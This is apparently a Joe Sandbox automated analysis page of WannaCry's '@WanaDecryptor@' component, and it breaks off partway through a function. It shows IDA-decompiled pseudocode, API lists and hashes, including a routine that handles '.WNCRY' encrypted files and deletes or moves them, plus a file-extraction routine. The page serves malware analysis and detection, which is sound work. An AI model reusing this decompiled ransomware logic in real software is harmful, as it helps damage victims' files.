                                  0x00408fb1
                                  0x00000000
                                  0x00000000
                                  0x00408fb9
                                  0x00408fbb
                                  0x00408fbb
                                  0x00408fbf
                                  0x00408fc4
                                  0x00408fc6
                                  0x00408fc6
                                  0x00408fd0
                                  0x00408fe5
                                  0x00408fe9
                                  0x00408ffa
                                  0x00409001
                                  0x00409005
                                  0x00409021
                                  0x00409022
                                  0x0040907e
                                  0x00409085
                                  0x00409086
                                  0x00409024
                                  0x0040902a
                                  0x0040902f
                                  0x00409043
                                  0x0040904e
                                  0x00409054
                                  0x0040905e
                                  0x00409068
                                  0x00409068
                                  0x00409099
                                  0x0040909f
                                  0x0040909f
                                  0x004090a3
                                  0x004090ac
                                  0x004090b0
                                  0x00408f4a
                                  0x00000000
                                  0x00408f4a
                                  0x004090b0
                                  0x00000000
                                  0x0040909d
                                  0x0040909d
                                  0x00000000
                                  0x0040909d
                                  0x00408f51

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _ftol$CapsDevice$#2414$#1641#2754BrushCreateFillRectSolid
                                  • String ID: DZA
                                  • API String ID: 2487345631-3378329814
                                  • Opcode ID: 46f8ac59b565287c612820a18e91b1c7afa6038287a955736cfc91f47d65fae1
                                  • Instruction ID: dda82c2241e8f2351b86cfb5efeedf8da928c70a362fdc9ee550b763b14e0e54
                                  • Opcode Fuzzy Hash: 46f8ac59b565287c612820a18e91b1c7afa6038287a955736cfc91f47d65fae1
                                  • Instruction Fuzzy Hash: 2CA147716087418FC324DF25C984AAABBE1FFC8704F148A2EF599D7291DA39D845CF86
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401600 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 120windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 65%
                                  			E00401600(void* __ecx, intOrPtr _a4, long _a8, intOrPtr _a12) {
				void* _t19;
				long _t21;
				long _t24;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				long _t48;
				void* _t49;
				intOrPtr _t50;

				_t27 = _a4;
				_t48 = _a8;
				_t19 = _t27 - 0x4e20;
				_t49 = __ecx;
				if(_t19 == 0) {
					if(_t48 != 0) {
						if(_t48 == 0xffffffff) {
							goto L14;
						}
						goto L15;
					} else {
						_push(__ecx);
						_a4 = _t50;
						L00412CAA();
						E00401970("Connected");
						_t21 = SendMessageA( *(_t49 + 0x80), 0x402, 0x1e, _t48);
						_push(_a4);
						_push(_t48);
						_push(_t27);
						 *(_t49 + 0xb0) = 0x23;
						L00412BAE();
						return _t21;
					}
				} else {
					_t19 = _t19 - 1;
					if(_t19 == 0) {
						if(_t48 != 0) {
							goto L9;
						} else {
							_push(__ecx);
							_a4 = _t50;
							L00412CAA();
							E00401970("Sent request");
							_t24 = SendMessageA( *(_t49 + 0x80), 0x402, 0x23, _t48);
							_push(_a4);
							_push(_t48);
							_push(_t27);
							 *(_t49 + 0xb0) = 0x28;
							L00412BAE();
							return _t24;
						}
					} else {
						_t19 = _t19 - 1;
						if(_t19 != 0) {
							L15:
							_push(_a12);
							_push(_t48);
							_push(_t27);
							L00412BAE();
							return _t19;
						} else {
							if(_t48 != 0) {
								if(_t48 != 1) {
									L9:
									if(_t48 == 0xffffffff) {
										L14:
										 *((intOrPtr*)(_t49 + 0xa8)) = 0xffffffff;
									}
									goto L15;
								} else {
									_push(__ecx);
									_a4 = _t50;
									L00412CAA();
									_t25 = E00401970("Succeed");
									_push(_a4);
									_push(_t48);
									_push(_t27);
									L00412BAE();
									return _t25;
								}
							} else {
								_push(__ecx);
								_a4 = _t50;
								L00412CAA();
								_t26 = E00401970("Received response");
								_push(_a4);
								_push(_t48);
								_push(_t27);
								 *((intOrPtr*)(_t49 + 0xa8)) = 1;
								L00412BAE();
								return _t26;
							}
						}
					}
				}
			}












                                  0x00401601
                                  0x00401609
                                  0x0040160d
                                  0x00401612
                                  0x00401614
                                  0x004016e7
                                  0x00401737
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004016e9
                                  0x004016e9
                                  0x004016ec
                                  0x004016f5
                                  0x004016fc
                                  0x00401710
                                  0x0040171c
                                  0x0040171d
                                  0x0040171e
                                  0x0040171f
                                  0x00401729
                                  0x00401731
                                  0x00401731
                                  0x0040161a
                                  0x0040161a
                                  0x0040161b
                                  0x00401691
                                  0x00000000
                                  0x00401693
                                  0x00401693
                                  0x00401696
                                  0x0040169f
                                  0x004016a6
                                  0x004016ba
                                  0x004016c6
                                  0x004016c7
                                  0x004016c8
                                  0x004016c9
                                  0x004016d3
                                  0x004016db
                                  0x004016db
                                  0x0040161d
                                  0x0040161d
                                  0x0040161e
                                  0x00401743
                                  0x00401749
                                  0x0040174a
                                  0x0040174b
                                  0x0040174c
                                  0x00401754
                                  0x00401624
                                  0x00401626
                                  0x00401661
                                  0x004016de
                                  0x004016e1
                                  0x00401739
                                  0x00401739
                                  0x00401739
                                  0x00000000
                                  0x00401663
                                  0x00401663
                                  0x00401666
                                  0x0040166f
                                  0x00401676
                                  0x00401681
                                  0x00401682
                                  0x00401683
                                  0x00401684
                                  0x0040168c
                                  0x0040168c
                                  0x00401628
                                  0x00401628
                                  0x0040162b
                                  0x00401634
                                  0x0040163b
                                  0x00401646
                                  0x00401647
                                  0x00401648
                                  0x00401649
                                  0x00401653
                                  0x0040165b
                                  0x0040165b
                                  0x00401626
                                  0x0040161e
                                  0x0040161b

                                  APIs
                                  • #2385.MFC42 ref: 00401653
                                  • #537.MFC42(Received response), ref: 00401634
                                    • Part of subcall function 00401970: #3092.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 00401997
                                    • Part of subcall function 00401970: #6199.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 0040199E
                                    • Part of subcall function 00401970: #800.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 004019AF
                                  • #537.MFC42(Succeed), ref: 0040166F
                                  • #2385.MFC42(?,?,?,Succeed), ref: 00401684
                                  • #537.MFC42(Sent request), ref: 0040169F
                                  • SendMessageA.USER32(?,00000402,00000023,?), ref: 004016BA
                                  • #2385.MFC42 ref: 004016D3
                                  • #537.MFC42(Connected), ref: 004016F5
                                  • SendMessageA.USER32(?,00000402,0000001E,?), ref: 00401710
                                  • #2385.MFC42 ref: 00401729
                                  • #2385.MFC42(?,?,?), ref: 0040174C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2385$#537$MessageSend$#3092#6199#800
                                  • String ID: Connected$Received response$Sent request$Succeed
                                  • API String ID: 3790904636-3692714192
                                  • Opcode ID: 77cbd13b205d5b60acded2d534e2f67ef19f14b7a7dcd1ce5799653af05fca91
                                  • Instruction ID: e9690c31fbc1831b63af9a5cc079f352e9ea826ed21b4fe1124c0ccffc889961
                                  • Opcode Fuzzy Hash: 77cbd13b205d5b60acded2d534e2f67ef19f14b7a7dcd1ce5799653af05fca91
                                  • Instruction Fuzzy Hash: A631E8B130430067C5209F1AD959EAF7B69EBD4BB4F10852FF149A33D1CA795C4582FA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404DD0 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 89windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 78%
                                  			E00404DD0(void* __ecx) {
				intOrPtr _t12;
				long _t13;
				struct HFONT__* _t15;
				long _t16;
				long _t17;
				int _t29;
				int _t32;
				int _t35;

				L00412CB0();
				_t12 =  *0x42189c; // 0x0
				_t13 =  *(_t12 + 0x824);
				 *(__ecx + 0x6c) = _t13;
				_push(CreateSolidBrush(_t13));
				L00412D5E();
				_t35 = __ecx + 0x70;
				_t15 = CreateFontA(0x10, 0, 0, 0, 0x2bc, 0, 0, 0, 0, 0, 0, 0, 0x20, "Arial");
				_push(_t15);
				L00412D5E();
				_push(0x403);
				L00412CE6();
				if(_t35 != 0) {
					_t29 =  *(_t35 + 4);
				} else {
					_t29 = 0;
				}
				_t16 = SendMessageA( *(_t15 + 0x20), 0x30, _t29, 1);
				_push(1);
				L00412CE6();
				if(_t35 != 0) {
					_t32 =  *(_t35 + 4);
				} else {
					_t32 = 0;
				}
				_t17 = SendMessageA( *(_t16 + 0x20), 0x30, _t32, 1);
				_push(2);
				L00412CE6();
				if(_t35 != 0) {
					SendMessageA( *(_t17 + 0x20), 0x30,  *(_t35 + 4), 1);
					return 1;
				} else {
					SendMessageA( *(_t17 + 0x20), 0x30, _t35, 1);
					return 1;
				}
			}











                                  0x00404dd5
                                  0x00404dda
                                  0x00404ddf
                                  0x00404de6
                                  0x00404def
                                  0x00404df3
                                  0x00404e1a
                                  0x00404e1d
                                  0x00404e23
                                  0x00404e26
                                  0x00404e2b
                                  0x00404e32
                                  0x00404e39
                                  0x00404e3f
                                  0x00404e3b
                                  0x00404e3b
                                  0x00404e3b
                                  0x00404e51
                                  0x00404e53
                                  0x00404e57
                                  0x00404e5e
                                  0x00404e64
                                  0x00404e60
                                  0x00404e60
                                  0x00404e60
                                  0x00404e70
                                  0x00404e72
                                  0x00404e76
                                  0x00404e7d
                                  0x00404e9f
                                  0x00404ea9
                                  0x00404e7f
                                  0x00404e88
                                  0x00404e92
                                  0x00404e92

                                  APIs
                                  • #4710.MFC42 ref: 00404DD5
                                  • CreateSolidBrush.GDI32(?), ref: 00404DE9
                                  • #1641.MFC42(00000000), ref: 00404DF3
                                  • CreateFontA.GDI32(00000010,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 00404E1D
                                  • #1641.MFC42(00000000), ref: 00404E26
                                  • #3092.MFC42(00000403,00000000), ref: 00404E32
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E51
                                  • #3092.MFC42(00000001), ref: 00404E57
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E70
                                  • #3092.MFC42(00000002), ref: 00404E76
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E88
                                  • SendMessageA.USER32(?,00000030,?,00000001), ref: 00404E9F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessageSend$#3092$#1641Create$#4710BrushFontSolid
                                  • String ID: Arial
                                  • API String ID: 1126252797-493054409
                                  • Opcode ID: 1de1fe04c409b87552040b023bf9e037168031db0fca800ba09ccd0f6b59f890
                                  • Instruction ID: f8dd995afa615cab71677879a74d6ff7c2e305333cbfc3da3be905e2a6067967
                                  • Opcode Fuzzy Hash: 1de1fe04c409b87552040b023bf9e037168031db0fca800ba09ccd0f6b59f890
                                  • Instruction Fuzzy Hash: CC21C6B13507107FE625A764DD86FAA2759BBC8B40F10011EB345AB2D1CAF5EC41879C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406DC0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 103windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 64%
                                  			E00406DC0(void* __ecx) {
				int _v76;
				int _v80;
				char _v84;
				int _v88;
				long _v92;
				void* _v96;
				int _v100;
				void* _v104;
				long _t28;
				void* _t29;
				struct HWND__* _t30;
				int _t32;
				void* _t35;
				int _t39;
				long _t47;
				int _t48;
				void* _t51;

				_t35 = __ecx;
				_t48 = 0;
				_t28 = SendMessageA( *(__ecx + 0x4e0), 0xe, 0, 0);
				_t47 = _t28;
				_v96 = 0;
				_v92 = _t47;
				_t4 = _t47 + 1; // 0x1
				L00412CEC();
				_t51 =  &_v104 + 4;
				_v88 = _t28;
				if(_t28 == 0) {
					return _t28;
				}
				_t29 = _t35 + 0x4c0;
				if(_t29 != 0) {
					_t30 =  *(_t29 + 0x20);
				} else {
					_t30 = 0;
				}
				SendMessageA(_t30, 0x44b, _t48,  &_v96);
				_t32 = _v88;
				 *((char*)(_t32 + _t47)) = 0;
				if(_t47 < 0) {
					L15:
					_push(_v88);
					L00412C98();
					return _t32;
				} else {
					do {
						__imp___strnicmp(_t48 + _v88, "<http://", 8);
						_t51 = _t51 + 0xc;
						if(_t32 == 0) {
							L7:
							_t48 = _t48 + 1;
							_t39 = _t48;
							if(_t48 > _t47) {
								goto L14;
							}
							_t32 = _v88;
							while( *((char*)(_t48 + _t32)) != 0x3e) {
								_t48 = _t48 + 1;
								if(_t48 <= _t47) {
									continue;
								}
								goto L14;
							}
							_t32 = _t48;
							_t48 = _t48 + 1;
							if(_t32 != 0xffffffff) {
								_v100 = _t32;
								_v104 = _t39;
								SendMessageA( *(_t35 + 0x4e0), 0x437, 0,  &_v104);
								_t32 = 0x20;
								_push( &_v84);
								_v84 = 0x54;
								_v76 = 0x20;
								_v80 = 0x20;
								L00412F4A();
							}
							goto L14;
						}
						_t32 = _v88;
						__imp___strnicmp(_t48 + _t32, "<https://", 9);
						_t51 = _t51 + 0xc;
						if(_t32 != 0) {
							goto L14;
						}
						goto L7;
						L14:
						_t48 = _t48 + 1;
					} while (_t48 <= _t47);
					goto L15;
				}
			}




















                                  0x00406dcc
                                  0x00406dce
                                  0x00406ddc
                                  0x00406dde
                                  0x00406de0
                                  0x00406de4
                                  0x00406de8
                                  0x00406dec
                                  0x00406df1
                                  0x00406df6
                                  0x00406dfa
                                  0x00406ee6
                                  0x00406ee6
                                  0x00406e00
                                  0x00406e08
                                  0x00406e0e
                                  0x00406e0a
                                  0x00406e0a
                                  0x00406e0a
                                  0x00406e1d
                                  0x00406e1f
                                  0x00406e25
                                  0x00406e29
                                  0x00406ed2
                                  0x00406ed6
                                  0x00406ed7
                                  0x00000000
                                  0x00406e2f
                                  0x00406e2f
                                  0x00406e3e
                                  0x00406e44
                                  0x00406e49
                                  0x00406e67
                                  0x00406e67
                                  0x00406e6a
                                  0x00406e6c
                                  0x00000000
                                  0x00000000
                                  0x00406e6e
                                  0x00406e72
                                  0x00406e78
                                  0x00406e7b
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406e7d
                                  0x00406e7f
                                  0x00406e81
                                  0x00406e85
                                  0x00406e8b
                                  0x00406e9e
                                  0x00406ea2
                                  0x00406ea8
                                  0x00406ead
                                  0x00406eb4
                                  0x00406ebc
                                  0x00406ec0
                                  0x00406ec4
                                  0x00406ec4
                                  0x00000000
                                  0x00406e85
                                  0x00406e4b
                                  0x00406e5a
                                  0x00406e60
                                  0x00406e65
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406ec9
                                  0x00406ec9
                                  0x00406eca
                                  0x00000000
                                  0x00406e2f

                                  APIs
                                  • SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 00406DDC
                                  • #823.MFC42(00000001,?,?), ref: 00406DEC
                                  • SendMessageA.USER32(?,0000044B,00000000,?), ref: 00406E1D
                                  • _strnicmp.MSVCRT ref: 00406E3E
                                  • _strnicmp.MSVCRT ref: 00406E5A
                                  • SendMessageA.USER32(?,00000437,00000000,?), ref: 00406EA2
                                  • #6136.MFC42 ref: 00406EC4
                                  • #825.MFC42(?), ref: 00406ED7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessageSend$_strnicmp$#6136#823#825
                                  • String ID: <http://$<https://$T
                                  • API String ID: 1228111698-1216084165
                                  • Opcode ID: d423051487410fe263d6ec4d138bc8bb6478c9a20731e0d0eb8aa801e432672a
                                  • Instruction ID: 32e461136b03d60599108953de6477053a568cccd29e118696d71e5d9ed076ef
                                  • Opcode Fuzzy Hash: d423051487410fe263d6ec4d138bc8bb6478c9a20731e0d0eb8aa801e432672a
                                  • Instruction Fuzzy Hash: 7E31D6B52043509BD320CF18CC41FABB7E4BB98704F044A3EF98AD7281E678D95987D9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402560 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 81fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 72%
                                  			E00402560(intOrPtr __ecx, WCHAR* _a4) {
				short _v720;
				intOrPtr _v724;
				void* _t21;
				void* _t22;
				WCHAR* _t23;
				void* _t30;
				short* _t31;
				intOrPtr* _t32;
				void* _t34;
				void* _t36;

				_t23 = _a4;
				_v724 = __ecx;
				_t30 = 0;
				wcscpy( &_v720, _t23);
				_t31 = wcsrchr( &_v720, 0x2e);
				_t34 =  &_v724 + 0x10;
				if(_t31 == 0) {
					L4:
					wcscat( &_v720, L".org");
				} else {
					_t32 = __imp___wcsicmp;
					_t21 =  *_t32(_t31, L".WNCRY");
					_t36 = _t34 + 8;
					if(_t21 == 0) {
						L3:
						 *_t31 = 0;
						_t30 = 1;
					} else {
						_t22 =  *_t32(_t31, L".WNCYR");
						_t34 = _t36 + 8;
						if(_t22 != 0) {
							goto L4;
						} else {
							goto L3;
						}
					}
				}
				if(E004020A0(_v724, _t23,  &_v720) == 0) {
					DeleteFileW( &_v720);
					goto L11;
				} else {
					if(DeleteFileW(_t23) == 0) {
						L11:
						return 0;
					} else {
						if(_t30 != 0) {
							return 1;
						} else {
							return MoveFileW( &_v720, _t23);
						}
					}
				}
			}













                                  0x00402567
                                  0x00402576
                                  0x0040257b
                                  0x0040257d
                                  0x00402590
                                  0x00402592
                                  0x00402597
                                  0x004025c9
                                  0x004025d3
                                  0x00402599
                                  0x00402599
                                  0x004025a5
                                  0x004025a7
                                  0x004025ac
                                  0x004025bd
                                  0x004025bd
                                  0x004025c2
                                  0x004025ae
                                  0x004025b4
                                  0x004025b6
                                  0x004025bb
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004025bb
                                  0x004025ac
                                  0x004025ed
                                  0x0040262e
                                  0x00000000
                                  0x004025ef
                                  0x004025f8
                                  0x00402637
                                  0x00402640
                                  0x004025fa
                                  0x004025fc
                                  0x00402626
                                  0x004025fe
                                  0x00402614
                                  0x00402614
                                  0x004025fc
                                  0x004025f8

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Delete_wcsicmp$Movewcscatwcscpywcsrchr
                                  • String ID: .WNCRY$.WNCYR$.org
                                  • API String ID: 1016768320-4283512309
                                  • Opcode ID: ca6531dd56d56dd65b8b31a4033326b7c97dce23bd12cfbd58547a94a49b2b6f
                                  • Instruction ID: 8e688c7c8c2018b5eb76f9bfe5eaf8fc18d5300b1d9ff01e022ce9e0f1e53e02
                                  • Opcode Fuzzy Hash: ca6531dd56d56dd65b8b31a4033326b7c97dce23bd12cfbd58547a94a49b2b6f
                                  • Instruction Fuzzy Hash: 29219576240301ABD220DB15FE49BEB7799DBD4711F44483BF901A2280EB7DD90987BE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412360 Relevance: 17.9, APIs: 7, Strings: 3, Instructions: 366COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 95%
                                  			E00412360(signed int __ecx, signed int _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v0;
				char _v260;
				struct _FILETIME _v268;
				struct _FILETIME _v276;
				struct _FILETIME _v284;
				void* _v292;
				void* _v296;
				signed int _v304;
				char _v560;
				struct _OVERLAPPED* _v820;
				void* _v824;
				void* _v827;
				void* _v828;
				long _v829;
				void* _v836;
				intOrPtr _t68;
				long _t77;
				void* _t81;
				void* _t82;
				void* _t90;
				void* _t91;
				long _t94;
				signed int _t97;
				long _t99;
				void* _t106;
				int _t116;
				long _t121;
				signed int _t132;
				signed int _t138;
				unsigned int _t140;
				signed int _t141;
				void* _t154;
				intOrPtr* _t157;
				intOrPtr _t166;
				void* _t174;
				signed int _t175;
				signed int _t176;
				long _t177;
				signed int _t178;
				signed int _t179;
				intOrPtr* _t180;
				void* _t182;
				long _t183;
				intOrPtr* _t185;
				void* _t187;
				void* _t191;
				void* _t192;

				_t166 = _a16;
				_t132 = __ecx;
				if(_t166 == 3) {
					_t68 =  *((intOrPtr*)(__ecx + 4));
					_t176 = _a4;
					__eflags = _t176 - _t68;
					if(_t176 == _t68) {
						L14:
						_t177 = E00411810( *_t132, _a8, _a12,  &_v829);
						__eflags = _t177;
						if(_t177 <= 0) {
							E00411AC0( *_t132);
							 *(_t132 + 4) = 0xffffffff;
						}
						__eflags = _v829;
						if(_v829 == 0) {
							__eflags = _t177;
							if(_t177 <= 0) {
								asm("sbb eax, eax");
								_t77 = 0x1000 + ( ~(_t177 - 0xffffff96) & 0x04fff000);
								__eflags = _t77;
								return _t77;
							} else {
								return 0x600;
							}
						} else {
							__eflags = 0;
							return 0;
						}
					} else {
						__eflags = _t68 - 0xffffffff;
						if(_t68 != 0xffffffff) {
							E00411AC0( *((intOrPtr*)(__ecx)));
							_t187 = _t187 + 4;
						}
						_t81 =  *_t132;
						 *(_t132 + 4) = 0xffffffff;
						__eflags = _t176 -  *((intOrPtr*)(_t81 + 4));
						if(_t176 <  *((intOrPtr*)(_t81 + 4))) {
							__eflags = _t176 -  *((intOrPtr*)(_t81 + 0x10));
							if(_t176 <  *((intOrPtr*)(_t81 + 0x10))) {
								E00411390(_t81);
								_t187 = _t187 + 4;
							}
							_t82 =  *_t132;
							__eflags =  *((intOrPtr*)(_t82 + 0x10)) - _t176;
							while( *((intOrPtr*)(_t82 + 0x10)) < _t176) {
								E004113E0(_t82);
								_t82 =  *_t132;
								_t187 = _t187 + 4;
								__eflags =  *((intOrPtr*)(_t82 + 0x10)) - _t176;
							}
							_push( *((intOrPtr*)(_t132 + 0x138)));
							_push( *_t132);
							E00411660();
							_t187 = _t187 + 8;
							 *(_t132 + 4) = _t176;
							goto L14;
						} else {
							return 0x10000;
						}
					}
				} else {
					if(_t166 == 2 || _t166 == 1) {
						_t178 = _t175 | 0xffffffff;
						__eflags =  *(_t132 + 4) - _t178;
						if( *(_t132 + 4) != _t178) {
							E00411AC0( *_t132);
							_t187 = _t187 + 4;
						}
						_t90 =  *_t132;
						 *(_t132 + 4) = _t178;
						_t179 = _a4;
						__eflags = _t179 -  *((intOrPtr*)(_t90 + 4));
						if(_t179 <  *((intOrPtr*)(_t90 + 4))) {
							__eflags = _t179 -  *((intOrPtr*)(_t90 + 0x10));
							if(_t179 <  *((intOrPtr*)(_t90 + 0x10))) {
								E00411390(_t90);
								_t187 = _t187 + 4;
							}
							_t91 =  *_t132;
							__eflags =  *((intOrPtr*)(_t91 + 0x10)) - _t179;
							while( *((intOrPtr*)(_t91 + 0x10)) < _t179) {
								E004113E0(_t91);
								_t91 =  *_t132;
								_t187 = _t187 + 4;
								__eflags =  *((intOrPtr*)(_t91 + 0x10)) - _t179;
							}
							_t138 = _t132;
							E00411CF0(_t138, _t179,  &_v560);
							__eflags = _v304 & 0x00000010;
							if((_v304 & 0x00000010) == 0) {
								__eflags = _t166 - 1;
								if(_t166 != 1) {
									_t157 = _a8;
									_t185 = _t157;
									_t180 = _t157;
									_t94 =  *_t157;
									__eflags = _t94;
									while(_t94 != 0) {
										__eflags = _t94 - 0x2f;
										if(_t94 == 0x2f) {
											L43:
											_t185 = _t180 + 1;
										} else {
											__eflags = _t94 - 0x5c;
											if(_t94 == 0x5c) {
												goto L43;
											}
										}
										_t94 =  *((intOrPtr*)(_t180 + 1));
										_t180 = _t180 + 1;
										__eflags = _t94;
									}
									asm("repne scasb");
									_t140 =  !(_t138 | 0xffffffff);
									_v828 =  &_v820;
									_t182 = _t157 - _t140;
									_t141 = _t140 >> 2;
									_t97 = memcpy(_v828, _t182, _t141 << 2);
									__eflags = _t185 - _t157;
									memcpy(_t182 + _t141 + _t141, _t182, _t97 & 0x00000003);
									_t191 = _t187 + 0x18;
									if(__eflags != 0) {
										 *((char*)(_t191 + _t185 - _t157 + 0x1c)) = 0;
										_t99 = _v820;
										__eflags = _t99 - 0x2f;
										if(_t99 == 0x2f) {
											L55:
											wsprintfA( &_v260, "%s%s",  &_v820, _t185);
											E00412250(0, _t191 + 0x2c);
											_t187 = _t191 + 0x18;
											goto L48;
										} else {
											__eflags = _t99 - 0x5c;
											if(_t99 == 0x5c) {
												goto L55;
											} else {
												__eflags = _t99;
												if(_t99 == 0) {
													goto L47;
												} else {
													__eflags =  *((char*)(_t191 + 0x1d)) - 0x3a;
													if( *((char*)(_t191 + 0x1d)) != 0x3a) {
														goto L47;
													} else {
														goto L55;
													}
												}
											}
										}
										goto L73;
									} else {
										_v820 = 0;
										L47:
										wsprintfA( &_v260, "%s%s%s", _t132 + 0x140,  &_v820, _t185);
										E00412250(_t132 + 0x140, _t191 + 0x30);
										_t187 = _t191 + 0x1c;
									}
									L48:
									_t174 = CreateFileA(_t187 + 0x260, 0x40000000, 0, 0, 2,  *(_t187 + 0x228), 0);
								} else {
									_t174 = _a8;
								}
								__eflags = _t174 - 0xffffffff;
								if(_t174 != 0xffffffff) {
									_push( *((intOrPtr*)(_t132 + 0x138)));
									_push( *_t132);
									E00411660();
									_t106 =  *(_t132 + 0x13c);
									_t192 = _t187 + 8;
									__eflags = _t106;
									if(_t106 == 0) {
										_push(0x4000);
										L00412CEC();
										_t192 = _t192 + 4;
										 *(_t132 + 0x13c) = _t106;
									}
									_v820 = 0;
									while(1) {
										_t183 = E00411810( *_t132,  *(_t132 + 0x13c), 0x4000, _t192 + 0x13);
										_t192 = _t192 + 0x10;
										__eflags = _t183 - 0xffffff96;
										if(_t183 == 0xffffff96) {
											break;
										}
										__eflags = _t183;
										if(__eflags < 0) {
											L68:
											_v820 = 0x5000000;
										} else {
											if(__eflags <= 0) {
												L63:
												__eflags =  *(_t192 + 0x13);
												if( *(_t192 + 0x13) != 0) {
													SetFileTime(_t174,  &_v276,  &_v284,  &_v268);
												} else {
													__eflags = _t183;
													if(_t183 == 0) {
														goto L68;
													} else {
														continue;
													}
												}
											} else {
												_t116 = WriteFile(_t174,  *(_t132 + 0x13c), _t183, _t192 + 0x18, 0);
												__eflags = _t116;
